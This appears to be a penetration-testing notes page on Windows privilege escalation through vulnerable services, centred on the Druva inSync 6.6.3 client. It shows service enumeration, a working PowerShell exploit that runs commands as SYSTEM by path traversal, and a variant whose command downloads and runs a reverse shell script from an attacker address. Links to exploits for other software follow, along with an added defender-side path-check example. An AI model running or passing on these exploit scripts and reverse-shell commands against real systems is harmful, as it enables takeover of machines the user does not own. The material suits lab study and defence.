# Vulnerable Services

## **Enumerating Installed Programs**

```cmd-session
C:\htb> wmic product get name

Name
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4023057)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127
VMware Tools
Druva inSync 6.6.3
Microsoft Update Health Tools
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4480730)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127
```

{% embed url="https://www.exploit-db.com/exploits/49211" %}

{% embed url="https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/" %}

### **Enumerating Local Ports**

```cmd-session
C:\htb> netstat -ano | findstr 6064

  TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       3324
  TCP    127.0.0.1:6064         127.0.0.1:50274        ESTABLISHED     3324
  TCP    127.0.0.1:6064         127.0.0.1:50510        TIME_WAIT       0
  TCP    127.0.0.1:6064         127.0.0.1:50511        TIME_WAIT       0
  TCP    127.0.0.1:50274        127.0.0.1:6064         ESTABLISHED     3860
```

### **Enumerating Process ID**

```powershell-session
PS C:\htb> get-process -Id 3324

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    149      10     1512       6748              3324   0 inSyncCPHwnet64
```

### **Enumerating Running Service**

```powershell-session
PS C:\htb> get-service | ? {$_.DisplayName -like 'Druva*'}

Status   Name               DisplayName
------   ----               -----------
Running  inSyncCPHService   Druva inSync Client Service
```

## Druva inSync Windows Client Local Privilege Escalation Example

### Powershell PoC

```powershell
$ErrorActionPreference = "Stop"

# Command line the service will execute in its own (SYSTEM) context
$cmd = "net user pwnd /add"

# Connect to the inSyncCPHService RPC listener on the loopback interface (see netstat output above)
$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

# Message framing: ASCII header, 4-byte RPC type (5, little-endian),
# 4-byte little-endian payload length, then the command line as UTF-16LE
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
# The path starts inside the inSync4 install directory but traverses out of it with "..\"
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd")
$length = [System.BitConverter]::GetBytes($command.Length)

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
```
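As an added defender-side example (not code from the original page, the Druva client or the linked PoC repositories), the following Python parses a message framed the way the PoC above frames it and shows why a prefix check on the raw executable path passes the `..\` traversal while the same check on the normalised path rejects it. The header string, field layout and `C:\ProgramData\Druva\inSync4` directory come from the PoC; `inSyncAgent.exe` and the function names are assumptions.

```python
import ntpath
import struct

# Framing as seen in the PoC: ASCII header, 4-byte little-endian RPC type,
# 4-byte little-endian payload length, UTF-16LE command line.
HEADER = b"inSync PHC RPCW[v0002]"
ALLOWED_ROOT = r"C:\ProgramData\Druva\inSync4"  # install directory used in the PoC path

def parse_rpc(msg: bytes):
    """Return (rpc_type, command_line) from one raw inSync RPC message."""
    if not msg.startswith(HEADER):
        raise ValueError("not an inSync RPC message")
    off = len(HEADER)
    rpc_type, length = struct.unpack_from("<II", msg, off)
    off += 8
    payload = msg[off:off + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return rpc_type, payload.decode("utf-16-le")

def executable_of(command_line: str) -> str:
    """First token of the command line: the path the service would execute.
    Quoted paths are handled; unquoted paths containing spaces are not."""
    if command_line.startswith('"'):
        return command_line[1:].split('"', 1)[0]
    return command_line.split(" ", 1)[0]

def resolved_executable(command_line: str) -> str:
    """Collapse '.' and '..' segments so the real target path is visible."""
    return ntpath.normpath(executable_of(command_line))

def naive_check(command_line: str, root: str = ALLOWED_ROOT) -> bool:
    """Prefix check on the raw string: the pattern a traversal defeats."""
    return executable_of(command_line).lower().startswith(root.lower() + "\\")

def safe_check(command_line: str, root: str = ALLOWED_ROOT) -> bool:
    """Normalise first, then confirm the path is still under the allowed root."""
    root_norm = ntpath.normpath(root).lower() + "\\"
    return resolved_executable(command_line).lower().startswith(root_norm)

def frame(command_line: str, rpc_type: int = 5) -> bytes:
    """Constructed test input mirroring the PoC framing (not captured traffic)."""
    payload = command_line.encode("utf-16-le")
    return HEADER + struct.pack("<II", rpc_type, len(payload)) + payload

if __name__ == "__main__":
    traversal = frame(r"C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c whoami")
    legit = frame(r"C:\ProgramData\Druva\inSync4\inSyncAgent.exe --status")  # hypothetical binary
    for m in (traversal, legit):
        rpc_type, cmd = parse_rpc(m)
        print(rpc_type, naive_check(cmd), safe_check(cmd), resolved_executable(cmd))
```

The traversal message resolves to `C:\Windows\System32\cmd.exe`: the naive check returns `True` and the normalised check returns `False`, which is the distinction a service-side allowlist (or a network detection rule on port 6064 traffic) has to make.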

#### Reverse shell

{% embed url="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" %}

Rename it to something simple like `shell.ps1`, then append the following line at the bottom of the script file:

```powershell
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443
```

Modify the `$cmd` variable to get a reverse shell:

```powershell
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3:8080/shell.ps1')"
```

<https://github.com/yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-/blob/main/DruvaPE.ps1>

```powershell
$ErrorActionPreference = "Stop"

# Modify the $cmd variable in the Druva inSync exploit PoC script to download our PowerShell reverse shell into memory.
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.4:8080/shell.ps1')"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd")
$length = [System.BitConverter]::GetBytes($command.Length)

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

# Change the IP address and port to match our listener
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443
```

#### Catching a SYSTEM Shell

Execute the PoC PowerShell script on the target host after bypassing the execution policy:

{% content-ref url="../../internal-pentest/bypass-powershell-execution-policy" %}
[bypass-powershell-execution-policy](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/bypass-powershell-execution-policy)
{% endcontent-ref %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FC5WHMCHVKWkhpg2BEkV9%2Fimage.png?alt=media&#x26;token=906da006-f333-4849-aecf-c734313154e2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F5OSfm5hAKBjqBa6t822X%2Fimage.png?alt=media&#x26;token=8cb8c7e4-54d6-4915-ad0e-2acf1aff5eac" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FVkbtfAUn23XCfssLDCXd%2Fimage.png?alt=media&#x26;token=089ac12d-710f-4285-bdf9-2e83d9dc3c64" alt=""><figcaption></figcaption></figure>

## SysaxAutomation

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FRfOEkxnNetWOBeJpaBr0%2Fimage.png?alt=media&#x26;token=1e52b908-836b-4104-b199-ce330fef689e" alt=""><figcaption></figcaption></figure>

{% embed url="https://www.exploit-db.com/exploits/50834" %}

## iTunes - CVE-2024-44193

iTunes version 12.13.2.3

{% embed url="https://github.com/mbog14/CVE-2024-44193" %}

## Teamviewer

{% content-ref url="../../public-exploit/teamviewer" %}
[teamviewer](https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/teamviewer)
{% endcontent-ref %}

## AnyDesk

Before v9.0.1.

{% content-ref url="../../public-exploit/anydesk" %}
[anydesk](https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/anydesk)
{% endcontent-ref %}
